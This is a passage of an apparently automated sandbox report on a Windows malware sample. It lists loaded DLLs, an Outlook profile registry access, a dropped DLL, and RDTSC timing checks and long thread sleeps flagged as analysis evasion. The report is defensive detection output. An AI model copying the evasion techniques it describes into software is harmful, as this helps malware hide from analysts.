            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: c7WJL1gt32.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2418431968.00000000050B4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 0_2_6CF11B5F LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6CF11B5F
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_3_001949CC push eax; iretd 4_3_001949CD
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_0015A487 push dword ptr [ebp+ecx-75h]; retf 4_2_0015A492
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_0015A4F9 push dword ptr [ebp+ebx-75h]; iretd 4_2_0015A4FD
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_3833C897 push es; retf 4_2_3833C898
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeFile created: C:\Users\user\AppData\Local\Temp\nse90B2.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeAPI/Special instruction interceptor: Address: 5A287D5
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeAPI/Special instruction interceptor: Address: 3F887D5
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeRDTSC instruction interceptor: First address: 59EDBA6 second address: 59EDBA6 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FC72940A704h 0x00000006 test bx, cx 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b test dx, bx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeRDTSC instruction interceptor: First address: 3F4DBA6 second address: 3F4DBA6 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FC728DFC034h 0x00000006 test bx, cx 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b test dx, bx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeMemory allocated: 35A20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeMemory allocated: 35690000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 599407Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 599282Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 599172Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 598644Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 598519Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 598391Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 598282Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 598157Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 598032Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 597907Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 597782Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 597563Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 597438Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 597313Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 597188Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 597063Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 596953Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 596844Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 596719Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 596244Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 596125Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 596014Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 595891Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 595782Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 595668Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 595547Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 595438Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 595328Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 595219Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 594999Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 594875Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 594766Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 594641Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 594531Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 594422Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 594313Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 594188Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeWindow / User API: threadDelayed 1635Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeWindow / User API: threadDelayed 8193Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nse90B2.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeAPI coverage: 3.2 %
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -28592453314249787s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8100Thread sleep count: 1635 > 30Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8100Thread sleep count: 8193 > 30Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -599657s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -599532s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -599407s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -599282s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -599172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -599063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -598938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -598813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -598644s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -598519s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -598391s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -598282s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -598157s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -598032s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -597907s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -597782s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -597672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -597563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -597438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -597313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -597188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -597063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -596953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -596844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -596719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -596610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -596485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -596360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -596244s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -596125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -596014s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -595891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -595782s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -595668s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -595547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -595438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -595328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -595219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -595110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -594999s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -594875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -594766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -594641s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -594531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -594422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -594313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exe TID: 8096Thread sleep time: -594188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_00402868 FindFirstFileW,4_2_00402868
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_0040672B FindFirstFileW,FindClose,4_2_0040672B
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,4_2_00405AFA
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 599407Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 599282Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 599172Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 598644Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 598519Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 598391Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 598282Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 598157Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 598032Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 597907Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 597782Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 597563Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 597438Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 597313Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 597188Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 597063Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 596953Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 596844Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 596719Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 596244Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 596125Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 596014Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 595891Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 595782Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 595668Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 595547Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 595438Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 595328Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 595219Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 595110Jump to behavior
